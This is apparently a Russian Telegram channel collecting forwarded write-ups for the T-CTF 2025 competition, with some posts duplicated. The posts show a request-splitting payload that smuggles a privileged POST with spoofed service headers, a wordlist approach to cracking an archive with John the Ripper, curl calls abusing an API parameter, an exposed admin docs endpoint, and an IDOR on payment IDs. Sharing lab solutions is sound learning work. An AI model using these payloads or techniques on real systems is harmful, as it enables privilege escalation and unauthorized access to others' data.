Forwarded from Bulat Gafurov
Имеем: Три микросервсиа общаются между собой по tls, что-то типо сервис меша.
1. Gateway - представляет из себя реверс прокси, также проверяет серты если подключение идет с другого сервиса.
2. User Info - микросервис по управлению информацией о пользователе
3. Shop - можем тут купить тему, сделать клик и купить премиум
Видим, что shop при покупке премиума просто проставляет множитель для юзера.
Попробуем дернуть так же эту ручку с сертом
Так же посмотрим как он делает
Видим, что если будем контролироваь один из
Ищем в коде через что мы можем засплитить запрос, видим что color отправляется как строка в ручку
Также вспоминаем как создается User-Id
то есть нам нужно значение до первой точки.
Важно заметить, что не ставим
Делал все в Burp, так что скриптов нет никаких.
Писал эту строчку на память, так как не сохранил.
1. Gateway - представляет из себя реверс прокси, также проверяет серты если подключение идет с другого сервиса.
2. User Info - микросервис по управлению информацией о пользователе
3. Shop - можем тут купить тему, сделать клик и купить премиум
Видим, что shop при покупке премиума просто проставляет множитель для юзера.
Попробуем дернуть так же эту ручку с сертом
client.crt, но ничего не получим, так как apigateway скорее всего сидит за балансер, сюда по docker-compose.yaml.params = fmt.Sprintf("multiplier=%d", 10)
client.Post("https://apigateway:9443/api/setUserMultiplier?" + params, headers)Так же посмотрим как он делает
Post запросhost := "apigateway:9443"
conn, err := tls.Dial("tcp", host, c.Config)
if err != nil {
return "", []byte{}, err
}
defer conn.Close()
request := fmt.Sprintf("POST %s HTTP/1.1\r\nHost: %s\r\n", urlString, host)
Видим, что если будем контролироваь один из
%s, то сможем засплитить запрос.Ищем в коде через что мы можем засплитить запрос, видим что color отправляется как строка в ручку
/api/buyColor, пробуем в ручку вставить такую строкуТакже вспоминаем как создается User-Id
sessionValue := createAndSignSession(string(userInfoRow.UserID))
c.SetCookie("session", sessionValue, 3600000, "", "", false, false)
func createAndSignSession(userID string) string {
...
return string(payload) + "." + string(hex.EncodeToString(expectedMAC))
}
то есть нам нужно значение до первой точки.
black HTTP/1.1
Host: apigateway:9443
X-From-Service: Yes
X-User-ID: <user-uuid-from-cookie>
POST /api/setUserMultiplier?multiplier=100000 HTTP/1.1
Host: apigateway:9443
X-From-Service: Yes
X-User-ID: <user-uuid-from-cookie>
Важно заметить, что не ставим
Connection: close, как в оригинальном запросе, чтобы соединение не закрылось.Делал все в Burp, так что скриптов нет никаких.
Писал эту строчку на память, так как не сохранил.
Forwarded from R H
#человекжук
По этому заданию количество комбинаций можно сократить до 54264 для подбора.
Смотрим алгоритм шифровани, раз играем на составные части, там видим, что для кодирования в base64 подаётся всегда комбинация из 6 символов, причем строка строится алгоритмом md5, который подразумевает использование только 16 символов (1234567890abcdef). Пишем скрипт, который генерирует wordlist для jack the ripper по принципе base64(123abc) -> MTIzYWJj бежим по этим значениям, получаем 54264 варианта, скармливаем архив Джеку рипперу с этим вордлистом, получаем результат за считанные секунды
По этому заданию количество комбинаций можно сократить до 54264 для подбора.
Смотрим алгоритм шифровани, раз играем на составные части, там видим, что для кодирования в base64 подаётся всегда комбинация из 6 символов, причем строка строится алгоритмом md5, который подразумевает использование только 16 символов (1234567890abcdef). Пишем скрипт, который генерирует wordlist для jack the ripper по принципе base64(123abc) -> MTIzYWJj бежим по этим значениям, получаем 54264 варианта, скармливаем архив Джеку рипперу с этим вордлистом, получаем результат за считанные секунды
👍5
S
Задача про землекопов лига опытных. Открываем в режиме разработчика бразуер. Смотрим сеть. Видим там запрос, раскрываем его и через курл тыкаем curl -X PUT https://site.ctfapi/cloner/{id} -H "Content-Type: application/json" -d '{"config": {"count": 1000000}}'…
автор прислал более компактное решение
Forwarded from S
curl -X PUT https://t-digduper-scx3wg9q.spbctf.net/api/cloner/62a02f86-9c99-432f-bb8e-0f8915baf840 -H "Content-Type: application/json" -d '{"config": {"count": 199999, "timeout": 30}}'
Forwarded from S
это корректиное решение, там еднственная тонкость что каунт до 200 000 и надо меньше. 200000 - входит в множество
Forwarded from GoldKing
1. Регаешься на сайте
2. Потом заходишь в админ панель с помощью
https://t-bugman-rhioogh9.spbctf.net/docs
3. Там есть GET /bugman-photos-stash-20240328
4. Try it out.
5. Там загружается страница и там сразу флаг
2. Потом заходишь в админ панель с помощью
https://t-bugman-rhioogh9.spbctf.net/docs
3. Там есть GET /bugman-photos-stash-20240328
4. Try it out.
5. Там загружается страница и там сразу флаг
Forwarded from R H
#человекжук
По этому заданию количество комбинаций можно сократить до 16млн для подбора.
Смотрим алгоритм шифровани, разбиваем на составные части, там видим, что для кодирования в base64 подаётся всегда комбинация из 6 символов, причем строка строится алгоритмом md5, который подразумевает использование только 16 символов (1234567890abcdef). Пишем скрипт, который генерирует wordlist для jack the ripper по принципу base64(123abc) -> MTIzYWJj бежим по этим значениям, получаем 16 млн варианта, скармливаем архив Джеку рипперу с этим вордлистом.
По этому заданию количество комбинаций можно сократить до 16млн для подбора.
Смотрим алгоритм шифровани, разбиваем на составные части, там видим, что для кодирования в base64 подаётся всегда комбинация из 6 символов, причем строка строится алгоритмом md5, который подразумевает использование только 16 символов (1234567890abcdef). Пишем скрипт, который генерирует wordlist для jack the ripper по принципу base64(123abc) -> MTIzYWJj бежим по этим значениям, получаем 16 млн варианта, скармливаем архив Джеку рипперу с этим вордлистом.
👍1
Forwarded from Айнур Низамов
Кстати по пятнецемобилю. Можно было глянуть кнопку оплаты, она всегда вела на страницу /pay?checkout_id=id, где вместо id какое то число от 1 и далее. Можно было потыкать с разными id и найти ту оплату, где уже кто то решил и получил флаг (на скажет флаг или то, что не хватает средств)
😁9❤5👍2🔥2
T-CTF, походу, решили отменить... :(
Источник:я календарь пересмотрю, а там апрель ведь начался
Источник:
💊19🤣10😁3
9 часов вечера
Все райтапы по поводу T-CTF 2025 просьба традиционно скидывать мне в личку: @EvgenyKurmysa
Раз уж все задачи называются по типу "Капибада", "Капикойн" и т.д., то к райтапам просьба добавлять название таски с хэштегом В НАЧАЛЕ, вот так: #капипример
Все райтапы по поводу T-CTF 2025 просьба традиционно скидывать мне в личку: @EvgenyKurmysa
Раз уж все задачи называются по типу "Капибада", "Капикойн" и т.д., то к райтапам просьба добавлять название таски с хэштегом В НАЧАЛЕ, вот так: #капипример
⚡4😁1
Forwarded from Дмитрий via @telegraph
Telegraph
AI-writeup "Капаре"
Writeup: Взлом билетов в t-caparet через ECB-атаку Задача На сайте https://t-caparet-mzcx3vv9.spbctf.org/ дано два представления театра: /book/1 и /book/2. На /book/2 можно забронировать билет, на /book/1 — нельзя: стоит искусственное ограничение. Цель: получить…
⚡1
Forwarded from Dmitriy
TCTF 2025.zip
9.5 MB
> Все райтапы по поводу T-CTF 2025 просьба традиционно скидывать мне в личку
поделюсь архивом из obsidian (10 задач)
поделюсь архивом из obsidian (10 задач)
⚡3
Forwarded from Dmitriy
Капибады
Капибаза
Капибарса
Капибегущая строка
Капиблеф
Капибокс
Капибонд
Капиботы
Капибьюти
Капипаркинг
Капибаза
Капибарса
Капибегущая строка
Капиблеф
Капибокс
Капибонд
Капиботы
Капибьюти
Капипаркинг
⚡1